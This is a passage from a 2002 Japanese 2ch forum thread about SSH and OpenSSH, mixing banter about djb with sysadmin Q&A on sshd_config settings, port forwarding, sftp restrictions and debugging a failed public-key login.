>>291は「djbなら安全」とかいう知識をどっかから聞きかじってきただけで、
どうせdjb関連のツールなんてろくに使ったことないでしょ。
djbも名前が一人あるきしてるな。

293 :名無しさん@Meadow:02/09/28 02:25
学者としてのdjbの専門はいちおー暗号なわけだから、
sshに使うかどうかは別として、ライブラリぐらいなら作っても不思議はないと思われ。

つーか、ネタにマジレス以下略。オレモナー。

294 :名無しさん@お腹いっぱい。:02/09/28 02:46
>292
>SSHなどという複雑怪奇なプロトコル
SSH自体は全く複雑でも奇怪でもないと思うが。
複雑なのは、それを実装しているプログラムかと。
それこそdjbの思想の出番でそ。djb自身は動きそうに無いけど。

てか、ネタにm(略

295 :名無しさん@お腹いっぱい。:02/09/28 03:41
>SSH自体は全く複雑でも奇怪でもないと思うが。

互換性がないバージョンが2つあるのは十分複雑だと思うが。
SSH2だけでも、djbが嫌ってるRFC822よりは十分複雑。

>学者としてのdjbの専門はいちおー暗号なわけだから、

例の訴訟に勝つまでは暗号関係のプログラムは公開しないんじゃないかなあ。


296 :名無しさん@お腹いっぱい。:02/09/28 06:15
>>295 しかし RFC822 はもはや変更しようがないし。

297 :名無しさん@お腹いっぱい。:02/09/28 11:05
>>291
みんなが騒ぐから……
ttp://djbsshd.qmail.jp/why-not.html


298 :名無しさん@お腹いっぱい。:02/09/28 14:31
しつこいがきんちょだなあ
面白くないっつの

299 :名無しさん@お腹いっぱい。:02/09/28 15:55
djb 厨は妄想癖が強い割に想像力が貧困な香具師ばかりだな。氏ねや。

300 :名無しさん@お腹いっぱい。:02/09/28 23:37
FreeBSDにOpenSSHを入れようとしてみました。
すると、./configureとmakeまでは何にも問題ないようでしたが、
make installしたら、
id: sshd: no suth user
WARNING: Privilege separation user "sshd" does not exist
って出て止まりますた。
sshdユーザが必要だったんですか?まったく気づきませんでした。
このユーザは名前がsshdなら何でも良いのでふか?
特権分離ユーザ・・・?ってなに?素人丸出しでスマソ。

301 :名無しさん@お腹いっぱい。:02/09/28 23:39
>>300
標準で入っている OpenSSH じゃ満足出来なく ports を使う事も拒むとは
よほどのパワーユーザ様なんですね。
尊敬しちゃいます。

302 :名無しさん@お腹いっぱい。:02/09/28 23:41
>>295
> SSH2だけでも、djbが嫌ってるRFC822よりは十分複雑。

# そもそも「プロトコル」であるSSH2と、mailの「フォーマット」を
# 定義しているRFC822とを比較するのはナンセンスだと思うが…

RFC822はその曖昧さが実装を面倒にさせている原因だろ。
おまけに、MIMEのような拡張があったり、RFCに厳密に準拠していない
agentの面倒もみなくちゃならなかったりするからな。

一方、SSH2(secsh)は記述量こそ大きいが、状態遷移は
非常に単純なプロトコルだし、Packetのフォーマットも
単純で厳密。
http://www.ietf.org/html.charters/secsh-charter.html

勉強がてらdsniffのsshmitmをSSH2に対応させたものを
作ってみたことがあるが、暗号化/復号部分をOpenSSLに
まかせれば、Transport LayerやAuthenticationの部分は
あっという間に作れてしまうぞ。

# 少なくともSSH2よりIMAP4の方が複雑だと思うな。

303 :名無しさん@お腹いっぱい。:02/09/29 01:44
>>296
え゛?RFC2822は?


304 :名無しさん@お腹いっぱい。:02/09/29 02:03
てゆーかRFCは定義じゃないんだが。
曖昧なのも当たり前。厨房かお前ら。


305 :名無しさん@お腹いっぱい。:02/09/29 02:06
>302
djbはOpenSSLも信用しないだろうな(藁

306 :名無しさん@お腹いっぱい。:02/09/29 08:17
>>305 あ、オレもopensslは信用してないよ。


307 :名無しさん@お腹いっぱい。:02/09/29 09:29
opensshは信用してるわけ??

308 :名無しさん@お腹いっぱい。:02/09/29 11:12
>>297
これ、原文はどこなんですか。最近の前里予さんはだいぶカドが取れた
感じがするけど、やっぱちょっとアレルギーがあるので。


309 :名無しさん@お腹いっぱい。:02/09/29 12:03
(・∀・)ジサクジエンデシタ

310 :sage:02/09/29 12:42
djbがssh実装して、theoと煽り合戦するとこみたい。金払うし。

311 :名無しさん@お腹いっぱい。:02/09/29 15:26
面白くなって参りました!

312 :名無しさん@お腹いっぱい。:02/09/30 23:27
>>311
おーい、皆んな緊張しちゃって面白くないこと書けなくなっちゃったぞ。


313 :名無しさん@お腹いっぱい。:02/10/02 19:38
あの・・・・ sftp って初めて知った。
名前だけは知ってたけど、sslwrapper + ftp と思ってた。
逝ってヨシ?

314 :302:02/10/02 23:48
>>305-306
OpenSSLを使うって言っても、暗号ライブラリの部分だけ。
(ソースでいうとcryptoディレクトリの下)
直接入出力に関わる部分じゃないし、そもそも暗号ライブラリって
アルゴリズムの塊だから、自分で実装しなおすメリットはあまりないかも。

# まあ、OpenSSLのSSL/TLS実装部分はごちゃごちゃしすぎて
# 信用できないってのには激しく同意。
# つーか、実際大穴があいていたし。
# http://www.cert.org/advisories/CA-2002-23.html

315 :名無しさん@お腹いっぱい。:02/10/03 00:03
>314
djbは libc すら信用しない人ですから

316 :302:02/10/03 00:20
>>315
> djbは libc すら信用しない人ですから
そうだった…スマソ

317 :名無しさん@お腹いっぱい。:02/10/03 02:15
いいかげん djb 厨の妄想ネタは余所でやってくれよ。

318 :名無しさん@お腹いっぱい。:02/10/03 08:14
>>317 ここらがいいかも。
http://pc.2ch.net/test/read.cgi/unix/1029619161/l50


319 : ◆XSSH/ryx32 :02/10/03 20:52
スレ汚し記念カキコ


320 :名無しさん@お腹いっぱい。:02/10/06 02:19
>>315
> djbは libc すら信用しない人ですから
でもシステムコール (というかカーネル) は信用してるのね。

321 :名無しさん@お腹いっぱい。:02/10/06 04:13
> でもシステムコール (というかカーネル) は信用してるのね。

信用できる部分をなるべくせばめる、ということでは。

322 :名無しさん@お腹いっぱい。:02/10/06 04:54
UNI×系OSにおいてカーネルとの唯一のインターフェースであるシステムコールを否定したら何も残らないじゃん

つーかスレ違(略

323 :名無しさん@お腹いっぱい。:02/10/06 13:45
djbBSD, djbLinux希望!!

324 :名無しさん@お腹いっぱい。:02/10/06 14:02
>>323
余所でやれと言ってるだろ。氏ね。

325 :名無しさん@お腹いっぱい。:02/10/06 14:43
これだからdjb厨房は…

326 :名無しさん@Emacs:02/10/08 17:46
ssh の ml 厨房が多いな

327 :名無しさん@お腹いっぱい。:02/10/09 01:37
日本語の ssh の ML なんてあるんだ。

328 :名無しさん@お腹いっぱい。:02/10/11 16:09
今日、OpenSSHとTTSSHを導入して、SSHバージン卒業たばっかなんで
優しくお願いしますね。

で、telnet止めてログインしてみたんだけど、鍵がなくてもアカウントとパス
ワードで入れるじゃないですか?

てっきり鍵セットがないと、ログインできなくなるんで安心なのかと思って
たんですが、違うんですかね?

カギのないホストからは、アカウントとパスワードが合っていても入れなく
はできないんでしょうか?



329 :名無しさん@お腹いっぱい。:02/10/11 16:12
>>328
> カギのないホストからは、アカウントとパスワードが合っていても入れなく
> はできないんでしょうか?
できます。

330 :328:02/10/11 16:18
>>329

それは、OpenSSH+TTSHでも可能なんですか?
良かったら、方法を教えてください。


331 :名無しさん@お腹いっぱい。:02/10/11 16:24
>>330
man sshd_config

332 :名無しさん@お腹いっぱい。:02/10/11 16:26
>>330
PasswordAuthentication no


333 :名無しさん@お腹いっぱい。:02/10/11 16:28
>>332
甘やかすなよ。

334 :328:02/10/11 16:39
>>331
>>332

sshd_config を設定して再起動したらできました。
ありがとうございました。


335 :328:02/10/11 16:41
>>333

すいませんね。
今度,OpenSSHセキュリティ管理ガイド 買おうと思ってます。

#導入書には、sshd_config は触る必要ないって書いてありました

336 :名無しさん@Emacs:02/10/11 17:14
>>335
> #導入書には、sshd_config は触る必要ないって書いてありました

(゚Д゚)ハァ?

337 :名無しさん@お腹いっぱい。:02/10/11 23:41
>>328
ChallengeResponseAuthentication no
も設定しておくべし。
http://home.jp.FreeBSD.org/cgi-bin/showmail/FreeBSD-users-jp/71239

338 :教えて君:02/10/11 23:43
すみません。自分なりに調べてみたけれどわからなかったので、質問させてください。

OpenSSHからSSHにSSHエージェントをフォワードして使うことはできないのでしょうか?
もし何か方法があるなら教えて欲しいのですが。

339 :名無しさん@お腹いっぱい。:02/10/12 00:23
普通にsshエージェントを動かすように設定すれば使えるよ

340 :名無しさん@お腹いっぱい。:02/10/12 00:47
リモートマシンで
echo $SSH_AUTH_SOCK
とやって何やら表示されてればagent forwardingがきいている。

341 :名無しさん@お腹いっぱい。:02/10/12 00:58
ADSL + DynamicDNS なホストに、slogin する度に、known_hosts が、
どんどん太っていくんで、困っているんだがなにかいい方法ない?

342 :338:02/10/12 01:04
回答ありがとうございます>>339 >>340
リモートマシンで
echo $SSH_AUTH_SOCK
とすると、
Undefined variable
と表示されてしまいました。何かおかしいところがないか勉強しなおしながらやってみます。

343 :名無しさん@お腹いっぱい。:02/10/12 01:40
>341
DDNS

344 :名無しさん@お腹いっぱい。:02/10/12 01:58
>>338
>>339
>>340
http://www.first.tsukuba.ac.jp/~kiyotomo/aboutopenssh.html
詳しくないけど、こんなのがあるから
agent forwardingが効かない場合もあるんじゃないの?

345 :名無しさん@お腹いっぱい。:02/10/12 02:10
>>341
おれのとこでは太っていかないなぁ。あれってIPアドレスで見てるのかな。ホスト名でみてるんじゃない?ちなみにおれは $HOME/.ssh/config に StrictHostKeyChecking yes って書いてる。

346 :名無しさん@お腹いっぱい。:02/10/12 08:46
>>345
お、それでいけますた。サンクスコ。

347 :名無しさん@お腹いっぱい。:02/10/12 11:14
SSHとは直接関係ないんですが、他に適当なスレが見当たらな
いので、質問させてもらいます。
自宅のTeratermでunix(Solaris)サーバにアクセスしてます。
1つのサーバは、emacs -nwもコンソールでも正常に日本語が
表示されますが、もう一つのサーバではコンソールは問題ない
のですが、emacs -nwでは、日本語表示が'????'になってしま
います。正常な方は.cshrcにLANG=jaとなっていて、異常な
方はLANG=japaneseとなっています。でもコンソールは問題
ないのでこれが原因とは思われません。.emacsは同じ記述で
す。何かお心当たりはありませんでしょうか。



348 :名無しさん@お腹いっぱい。:02/10/12 12:30
表示がうまくいかないほうのサーバもLANG=jaにしたらどうなりますか?

349 :名無しさん@お腹いっぱい。:02/10/12 13:26
>>349
レスありがとん。
.cshrcで'set LANG ja'にしてもだめでした。
実は正常に日本語表示できる方は、emacsではなくmuleでした。
日本語表示できないほうは、emacs20.6です。
.Xdefaultsは、-nwで起動するときは効いてこないのですよね。
.Xdefaultsには違いがあるんですが関係ないですよね。


350 :名無しさん@Meadow:02/10/12 13:34
set してどーする。setenv だろ。
つーか、ssh 関係ない。くだ質あたりに逝ってらっしゃい。

351 :名無しさん@お腹いっぱい。:02/10/12 15:20
>347
~/.emacs の見直し
てか禿スレ違い

352 :名無しさん@お腹いっぱい。:02/10/12 16:52
Soralis7 (Sparc)に OpenSSH 3.4p1をインストールしたんですが
sshd起動時に"特権分離と圧縮は使えない"みたいなメッセージが
でます。特権分離が有効になる条件は何でしょうか?
インストールは ./configure; make; make install
でやってます。

353 :名無しさん@お腹いっぱい。:02/10/12 16:59
>>352
がいしゅつ過ぎ。
README.privsep 読め。

354 :名無しさん@お腹いっぱい。:02/10/15 21:11
OpenSSH 3.5
http://www.openssh.com/

355 :名無しさん@お腹いっぱい。:02/10/15 22:41
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

356 :名無しさん@お腹いっぱい。:02/10/15 22:59
portableはまだか?

357 :名無しさん@お腹いっぱい。:02/10/15 23:12
>>352
圧縮をやめよう

358 :名無しさん@お腹いっぱい。:02/10/15 23:51
>>354
まだどこにもファイルねーじゃん

359 :名無しさん@お腹いっぱい。:02/10/16 00:55
ホントダ

360 :名無しさん@お腹いっぱい。:02/10/16 01:01
そして失われた信用は永遠に取り戻すことは出来なかったとさ。
めでたしめでたし。

361 :名無しさん@お腹いっぱい。:02/10/16 01:04
cd src; cvs up usr.bin/ssh


362 :名無しさん@お腹いっぱい。:02/10/16 11:12
3.5p1、ftp.openbsd.orgでダウソしますた

363 :名無しさん@お腹いっぱい。:02/10/16 12:06
今回も毒入ってた?

364 :毒無し:02/10/16 12:46
- MD5 (openssh-3.5p1.tar.gz) = 42bd78508d208b55843c84dd54dea848
- MD5 (openssh-3.5.tgz) = 79fc225dbe0fe71ebb6910f449101d23

365 :名無しさん@Meadow:02/10/16 18:34
>>347 - >>351でお世話になったものですが、
TeraTerm上で、emacs -nwで日本語が化けていた原因が
分かりましたので一応報告させていただきます。
(set-terminal-coding-system 'euc-jp)
を入れたらOKとなりました。このサーバはこの前まで
私の机にあったので、直接サーバー機にログインしてやって
ましたので、これがなくても大丈夫だったのですた。
スレ汚しスマソ。


366 :名無しさん@お腹いっぱい。:02/10/16 19:43
>>365
最初にチェックすべきとこだな、おまけにスレ違い、あほんだらが。

367 :365:02/10/18 09:55
>>366
 (;´Д`)  スミマセンスミマセン
 (  八)
   〉 〉
許してくらさい




368 :さんざんガイシュツだが…:02/10/18 13:43
>>367
SSHについては
  http://www.unixuser.org/~haruyama/security/openssh/support/
の本読んどけ。ぜってー損はしないからな。

369 :名無しさん@お腹いっぱい。:02/10/18 21:55
>>368
> ぜってー損はしないからな
主語は「貴方が」ですか?

370 :名無しさん@お腹いっぱい。:02/10/19 04:49
煽りでないとして…

>>369
「少なくとも」私は読んでよかったと思ってます。

371 :名無しさん@お腹いっぱい。:02/10/19 09:30
大学から家にsshでつなぎたいんです。
http://www.gcd.org/sengoku/docs/NikkeiLinux01-01/telnet.ja.html#COMMAND
ここ見てやってます。

ProxyCommandを指定すると、

・Linux(Vine)からは、とりあえずプロキシコマンドを読むところまでは行く(繋がらないけど)。

・Windows(2000)からTeraTermや本家SSH(?)で試すと、
/bin/sh: ~/.ssh/proxy-telnet: not found
ssh_exchange_identification: Connection closed by remote host
とでて終了します。(これは本家SSHの結果。TeraTermでも同じ意味の結果がでました)
何が原因でしょうか?

Unix初心者で大学の計算機の構成が良くわからないんですが、
とりあえず個々のPCにWindows2000とVineLinuxが入ってて、
WindowsからはTeraTermで学内のTelnetサーバかSSHサーバにログインして操作します。
本家SSHで試したのは、家からダイヤルアップPPPで学校に接続して学内SSHサーバにログインし、
そこから家に接続しかえそうとしたときです。

372 :名無しさん@お腹いっぱい。:02/10/19 09:34
>>371
> 大学の計算機の構成が良くわからないんですが
おまえがわからないものが俺らにわかるはずが無い管理者に聞け。

373 :371:02/10/19 09:39
>>372
似たような環境もたくさんありそうで、一般的な症状だったら
解決策がわかる人もいるかもしれないと思ったんですが。

374 :名無しさん@お腹いっぱい。:02/10/19 10:50
>>373
んじゃ、似たような環境の人がくるまで根気良く待っててください。

375 :名無しさん@お腹いっぱい。:02/10/19 16:29
/bin/sh: ~/.ssh/proxy-telnet: not found
これが全てだと思うのですが、ファイルあんの?

376 :371:02/10/19 19:41
>>375
レスありがとうございます。

例えば、>>371のエラーが出た直後に
mule ~/.ssh/proxy-telnet
とすればちゃんとファイルが開きます。

377 :名無しさん@お腹いっぱい。:02/10/19 19:50
>>376
あんたのログインシェルはbashかcshか知らんが、
/bin/shではチルダ使えんよ。絶対パスで指定スレ


378 :371:02/10/19 20:13
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
大学のログインシェルがtcshだったからLinuxからはうまくいってたんですね!
絶対パスを指定したらTeraTermからプロキシコマンドまでは実行できました。
デフォルトのtcshしか使ったことなかったから知らなかったです…お恥ずかしい。
でも
mule ~/.ssh/proxy-telnet
でちゃんとファイルが開けたのがなぜかはわかってません。

>>377さんありがとうございました!


…さてやっとここからが本番か…

379 :名無しさん@お腹いっぱい。:02/10/23 00:59
>…さてやっとここからが本番か…
この調子じゃ先が思いやられるのお。大学のみならず人生も…

380 :371:02/10/23 07:21
>>379
おかげさまで目標達成しました。
次はファイルサーバ立てようと思います。

381 :名無しさん@お腹いっぱい。:02/10/23 11:41
ネタだと言ってくれ。

382 :名無しさん@お腹いっぱい。:02/10/23 13:53
ssh -f でバックグラウンドに移行したプロセスの pid を得る方法ってある?

vnc をポートフォワーディング使って vnc 終了させたらそのまま
フォーワディングしていた ssh プロセスも終了させたい

#!/bin/sh
ssh -2CNf -L 5900:192.168.0.1:5900 -l hoge remote.domain
vncviewer localhost
kill $PID

ここで PID が解からない!?
bash でも csh 系でもいいです。

383 :x:02/10/23 14:04
これって本当か?

↓ ↓ ↓
http://www.dream-express-web.com/space-trust.htm


384 :名無しさん@Emacs:02/10/23 16:14
>>382
pgrep つかえや

385 :382:02/10/23 17:03
>>384
Thanks :-) 結局 pkill にしますた
確実に forwarder プロセスを見つけようと思ったけど、
ローカルポート指定している時点でユニークに決まってるもんな。

386 :名無しさん@お腹いっぱい。:02/10/23 18:04
openssh3.5が出ていたのでインストールしました。(FreeBSDです)
そのときopenssh3.1でport22が空いているサーバへ接続し
cvsupをしportsからopensshをインストール
その時点でtelnet localhost 22 とすると古いバージョンが出ますが
/usr/local/etc/rc.d/sshd.sh stop
/usr/local/etc/rc.d/sshd.sh start
と、すると
telnet localhost 22 SSH-1.99-OpenSSH_3.5
と、なり最新版の返事が返ってきました。
で、質問なのですがstopしたときに切れなかったのが謎です。
なんでしょうか?

387 :名無しさん@お腹いっぱい。:02/10/23 18:32
>>386
stop のときに何をしているか見ましょう。
ちなみに、sshd は、ご主人プロセスだけを殺すことが可能です。


388 :名無しさん@お腹いっぱい。:02/10/23 21:14
>> 382
リモートコマンドに「sleep 20」とか指定してssh起動すれば、
フォーワディング上のプロセスが終了した時にsshも自動で終了できたり。


389 :名無しさん@お腹いっぱい。:02/10/23 23:16
>>386
前のプロセスが生きてただけだろ・・・

390 :名無しさん@お腹いっぱい。:02/10/31 03:55
OpenSSHのマシンからSSH2のマシンを経由して
その先のOpenSSHのマシンにファイルを転送したいのですが
(できればSSH2のマシンに一時ファイルを作らずに)
なにかよい方法はありますでしょうか?


391 :名無しさん@XEmacs:02/10/31 13:26
>>390
> OpenSSHのマシンからSSH2のマシンを経由して
> その先のOpenSSHのマシンにファイルを転送したいのですが

“その先の OpenSSH のマシン”の port 22 をどっかの port に
LocalForward するようなオプション付けて OpenSSH のマシンか
ら SSH2 のマシンに slogin。

で、OpenSSH のマシンで

scp -P 'どっかの port' path1 localhost:path2 (なりなんなり)


392 :390:02/10/31 15:22
>>391
どうもありがとうございます。できました。
ポートフォワーディングの使い方を知らないことが
もろばれになってしまった気がします。

わからないついでにもうひとつ聞きたいのですが、
間にあるSSH2のマシンが二つ(あるいはそれ以上)ある場合には
どのようにすればいいのでしょうか?

マシン1(OpenSSH)−マシン2(SSH2)−マシン3(SSH2)−マシン4(OpenSSH)
みたいな構成で、マシン1から4へファイルを転送したい場合です。

393 :名無しさん@XEmacs:02/10/31 18:51
>>392
> マシン1(OpenSSH)−マシン2(SSH2)−マシン3(SSH2)−マシン4(OpenSSH)
> みたいな構成で、マシン1から4へファイルを転送したい場合です。

マシン2→マシン3にsloginしてマシン4のport 22をマシン2にフォ
ワード。

で、マシン1からマシン2にフォワードされたポートへscp。

マシンが 5 台以上ある場合にもフォワードされたポートをさらにフォ
ワードしてやればいけるんじゃないかな。やったことはないけど。

SSH2 なら cipher=none が使えるから、多段になってもたぶん大丈夫。

あと重要なのは GatewayPorts を yes にしとく。see ssh2_config。

394 :390:02/10/31 22:12
>>393
どうもありがとうございます
ためしに実験してみたらうまく動きました。
フォワードされたポートをさらにフォワードする
というのもやってみましたが成功しました。
本当にどうもありがとうございました

395 :名無しさん@お腹いっぱい。:02/10/31 22:43
ttyrec -u
という解もある

ttp://namazu.org/~satoru/ttyrec/

396 :login:Penguin:02/11/01 00:28
http://sshtools.sourceforge.net/ というのをはけーんしますた。
がいしゅつ?


397 :名無しさん@お腹いっぱい。:02/11/13 16:02
NFS over SSHとか出来ませんか?

398 :名無しさん@お腹いっぱい。:02/11/13 16:05
>>397
TCP ならできるんでないの?
使いものになるかは知らんが。

399 :名無しさん@お腹いっぱい。:02/11/13 16:07
>>397
それ以前に RPC over ssh ができないといけない。

400 :名無しさん@お腹いっぱい。:02/11/13 22:36
ssh を使わなければならないような回線で NFS して何かうれしいのか問い詰めたい

401 :春山征吾 ◆ok9Ggg6xsM :02/11/13 23:53
Secure NFS via SSH Tunnel
http://www.math.ualberta.ca/imaging/snfs/
というページがあります。自分で試したことはありません。

402 :名無しさん@お腹いっぱい。:02/11/14 06:52
http://www.appgate.com/mindterm/

MindTermの内蔵Pluginの『FTP to SFTP bridge』ってのが既存のFTP
クライアントを使える点でかなりいいんだけど、起動するまでの手順が
めんどくさい。『FTP to SFTP bridge』専用のソフトがほしい。

あと、JavaだからUSBメモリ等で持ち運んだとしてもJRE入ってない
と出先で動かない・・・。

JAVA以外で同様の機能を実現してるソフトってどっかにない?

403 :名無しさん@お腹いっぱい。:02/11/14 19:41
hosts.equivを使って認証させたいんですが、
/etc/ssh/sshd_configに

RhostsAuthentication yes

としても、アクセスするとパスワードを求められます。
クライアントでは/etc/ssh/ssh_configで
Protocol 1
RhostsAuthentication yes
としています。
バージョンはサーバが3.4pでクライアントが3.5p ともにlinuxです。
足りない設定とかあるんでしょうか。

ちなみにプロトコル2では、HostbasedAuthentication では認証ができました。


404 :名無しさん@お腹いっぱい。:02/11/14 20:04
hosts.equivなんか使ったら、ssh使う意味ないんでない。


405 :名無しさん@お腹いっぱい。:02/11/15 00:18
>>403
/etc/ssh/ssh_known_hosts にクライアントホストの
公開鍵(っていうんだっけ?)は登録してる?
ssh でクライアントにはじめてアクセスするときに
.ssh/known_hosts に蓄えられるやつ。

あと、クライアントの /usr/bin/ssh が suid root
されてないとダメ。

406 :名無しさん@お腹いっぱい。:02/11/15 02:16
>>403
RhostsAuthenticationは公開鍵による認証が行なわれないので
使ってはいけない。
プロトコル2のHostbasedAuthenticationと同じなのは
RhostsRSAAuthenticationのほう。

407 :405:02/11/15 04:31
RhostsRSAAuthenticationだと勘違いしてた。ゴメン。
RhostsAuthenticationならssh_known_hostsはいらない。

ただ >>406 の言う通りRhostsRSAAuthenticationを使う方がいい。

408 :403:02/11/15 07:20
RhostsRSAAuthenticationは公開鍵認証が必要なため、
hosts.equivだけの認証を使いたかったので
プロトコル1のRhostsAuthenticationを選択したのですが…

RhostsAuthenticationでも/usr/bin/sshがsuidされていないと
ダメなんでしょうか

409 :405:02/11/15 12:28
>>408
やったことないからしらない。スマン。
でもたぶんsuidされてないとダメだとおもうよ。
sshd はRhostsAuthenticationする場合、
特権portからの接続しか受け付けないから。

ところで、危険を承知で公開鍵認証したくない
シチュエーションってどんなの?

410 :名無しさん@お腹いっぱい。:02/11/15 13:14
お知恵を拝借。
sftpするとcdコマンドで上位ディレクトリに移動できたりしますよね。
ProFTPやwu-FTPであれば、設定によりユーザはホームディレクトリから上位には行けないようにできますが、sftpではそのような設定は可能ですか?

あるいは、sshコマンドでの接続は全ユーザに許可するが、sftpコマンドでの接続は管理者だけに制限するとか、そんな設定って可能ですか?


411 :名無しさん@お腹いっぱい。:02/11/15 13:23
http://www.pizzashack.org/rssh/index.shtml

412 :名無しさん@お腹いっぱい。:02/11/15 14:08
chroot patchってどうして削られちゃったんだろうな…

413 :!= 403:02/11/15 16:11
>>409
ユーザがドキュソな場合。

414 :名無しさん@お腹いっぱい。:02/11/15 22:41
411のrsshってsftpは許すけど、sshは制限するものですよね。たぶん(英語がにが。。)
ちょっとちがう。
412のchroot patchは。もうダメポ?


415 :名無しさん@お腹いっぱい。:02/11/15 22:47
chmod o-x /usr/libexec/sftp-server
とか。

chroot patch なら unofficial なものがどっかにあったはず。
OpenBSD 版じゃなくて p のほうへの patch です。
(しかたないので自分で書いたのを使ってます)


416 :403:02/11/15 23:41
>>409
ファイアーウォール内の計算サーバにアクセスする
バックエンド計算ホスト100台超からの認証。ただしrコマンド不可
こんなところです(^^;

417 :名無しさん@お腹いっぱい。:02/11/16 03:57
FreeBSD 4.7R から Cygwin sshd に接続しようとしています。
公開鍵を Cygwin 上の ~/.ssh/authorized_keys に入れて

ssh -2 192.168.0.3

するとパスワードを聞かれます。
公開鍵で認証したいのですが何故パスフレーズを聞かれないのでしょうか?

ssh -2 -v 192.168.0.3

OpenSSH_3.4p1 FreeBSD-20020702, SSH protocols 1.5/2.0, OpenSSL 0x0090607f
Pseudo-terminal will not be allocated because stdin is not a terminal.
debug1: Reading configuration data /home/mona/.ssh/config
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: ssh_connect: needpriv 0
debug1: Connecting to 192.168.0.3 [192.168.0.3] port 22.
debug1: Connection established.
debug1: identity file /home/mona/.ssh/id_rsa type -1
debug1: identity file /home/mona/.ssh/id_dsa type 2
debug1: Remote protocol version 1.99, remote software version OpenSSH_3.5p1
debug1: match: OpenSSH_3.5p1 pat OpenSSH*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_3.4p1 FreeBSD-20020702
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: server->client aes128-cbc hmac-md5 none
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP


418 :名無しさん@お腹いっぱい。:02/11/16 03:59
debug1: dh_gen_key: priv key bits set: 135/256
debug1: bits set: 1599/3191
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug1: Host '192.168.0.3' is known and matches the DSA host key.
debug1: Found key in /home/mona/.ssh/known_hosts:1
debug1: bits set: 1566/3191
debug1: ssh_dss_verify: signature correct
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: done: ssh_kex2.
debug1: send SSH2_MSG_SERVICE_REQUEST
debug1: service_accept: ssh-userauth
debug1: got SSH2_MSG_SERVICE_ACCEPT
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is publickey
debug1: try privkey: /home/mona/.ssh/id_rsa
debug1: try pubkey: /home/mona/.ssh/id_dsa
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is keyboard-interactive
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is password
debug1: authentications that can continue: publickey,password,keyboard-interactive


419 :名無しさん@お腹いっぱい。:02/11/16 04:00
Permission denied, please try again.
debug1: authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: no more auth methods to try
Permission denied (publickey,password,keyboard-interactive).
debug1: Calling cleanup 0x804bed0(0x0)


----ここまで

publickey を飛ばしてしまっているようなのですが。

420 :名無しさん@お腹いっぱい。:02/11/16 05:57
ssh -2 -i {secret key} {hostname}
…でダメ?

421 :名無しさん@お腹いっぱい。:02/11/16 06:00
ssh -v -2 -i .ssh/id_dsa 192.168.0.3

してみましたが、やはりパスワードを聞かれました。


debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is publickey
debug1: try pubkey: .ssh/id_dsa
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is keyboard-interactive
debug1: authentications that can continue: publickey,password,keyboard-interactive
debug1: next auth method to try is password


422 :419=421:02/11/16 06:10
接続先の ~/.ssh は 700 ~/.ssh/authorized_keys は 600 になっています。


423 :名無しさん@お腹いっぱい。:02/11/16 15:17
ttp://chrootssh.sourceforge.net/
がありました。情報さんくす。


424 :名無しさん@お腹いっぱい。:02/11/16 19:47
>>422
サーバー側は何と言ってる? sshd -d で試したログ希望。

425 :名無しさん@お腹いっぱい。:02/11/17 11:51
openssh-3.5p1 + openssl-0.9.6cでコンパイルしようとすると

configure: error: OpenSSL version header not found.

などといわれます。コンパイル環境は「Openblocks S」とredhat5.2です。
両方とも同じエラーが出るので困ってます。

ちなみにopensslは通常ユーザーのディレクトリにsslという
ディレクトリを作成して

./config --prefix=~user1/ssl shared

などとしてコンパイルしています。

426 :名無しさん@お腹いっぱい。:02/11/17 13:29
>>425
configureスクリプトがインストールされているOpenSSLを見つけられないから
中断しちまったんだろ。OpenSSLがインストールされているディレクトリを
指定すればいいよ:
% ./configure --with-ssl-dir=[PATH]


ってかOpenSSHのマニュアル読めっつーの。

あとOpenSSLは最新版0.9.6gを使うようにな。セキュリティ上の問題がfixされてるから。

427 :名無しさん@お腹いっぱい。:02/11/17 14:52
0.9.6gの間違いでした。「./configure --with-ssl-dir…」の方は
ちゃんと指定してました。

gnuのfileutilsを入れなおしたり、gccのバージョンをあげているうちに問題
は自然に解決しました(redhat5.2のみ)。あとはopenblocksの方を
なんとかすれば…

428 :419:02/11/17 17:34
sshd -d してみました。長くなるので関係ありそう部分を。
なんで port 1349 を使っているんだ?

debug1: SSH2_MSG_NEWKEYS received
debug1: KEX done
debug1: userauth-request for user mona service ssh-connection method none
debug1: attempt 0 failures 0
Failed none for mona from 192.168.0.2 port 1349 ssh2
debug1: userauth-request for user mona service ssh-connection method publickey
debug1: attempt 1 failures 1
debug1: test whether pkalg/pkblob are acceptable
Failed none for mona from 192.168.0.2 port 1349 ssh2
debug1: temporarily_use_uid: 1000/513 (e=18/544)
debug1: trying public key file /home/mona/.ssh/authorized_keys
debug1: restore_uid: (unprivileged)
debug1: temporarily_use_uid: 1000/513 (e=18/544)
debug1: trying public key file /home/mona/.ssh/authorized_keys2
debug1: restore_uid: (unprivileged)
Failed publickey for mona from 192.168.0.2 port 1349 ssh2
debug1: userauth-request for user mona service ssh-connection method keyboard-interactive
debug1: attempt 2 failures 2
debug1: keyboard-interactive devs
debug1: auth2_challenge: user=mona devs=
debug1: kbdint_alloc: devices ''
Failed keyboard-interactive for mona from 192.168.0.2 port 1349 ssh2
debug1: userauth-request for user mona service ssh-connection method password
debug1: attempt 3 failures 3
Accepted password for mona from 192.168.0.2 port 1349 ssh2

429 :hdk:02/11/17 18:54
